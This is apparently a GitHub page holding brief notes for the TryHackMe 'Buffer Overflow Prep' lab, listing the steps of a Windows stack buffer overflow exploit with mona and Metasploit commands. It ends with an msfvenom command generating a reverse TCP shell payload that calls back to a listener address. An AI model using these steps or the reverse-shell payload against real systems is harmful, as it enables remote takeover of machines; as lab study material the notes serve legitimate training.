-
Notifications
You must be signed in to change notification settings - Fork 0
/
ez-bof
72 lines (25 loc) · 990 Bytes
/
ez-bof
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#https://tryhackme.com/room/bufferoverflowprep
#https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c
First of all, we need to set mona config directory :
!mona config -set workingfolder c:\mona\%p
And then create pattern :
msf-pattern_create -l 2400
Add pattern in payload and run exploit.py
If program got crush, find offset :
!mona findmsp -distance 2400
We will get the required offset.
Let's try to overwrite EIP address with 42424242
return = "BBBB"
Let's find bad chars, first set config to compare :
!mona bytearray -b "\x00"
To generate bad chars, run badchars.py
Add badchars to payload.
Run exploit.py
!mona compare -f C:\mona\offsec_pwk_srv\bytearray.bin -a <ESP-address>
find actual return address :
!mona jmp -r esp -cpb "\x00"
\x83\x66\x52\x56
Add padding in exploit.py
padding = "\x90" * 16
Shell payload :
msfvenom -p windows/shell_reverse_tcp LHOST=10.6.75.240 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00"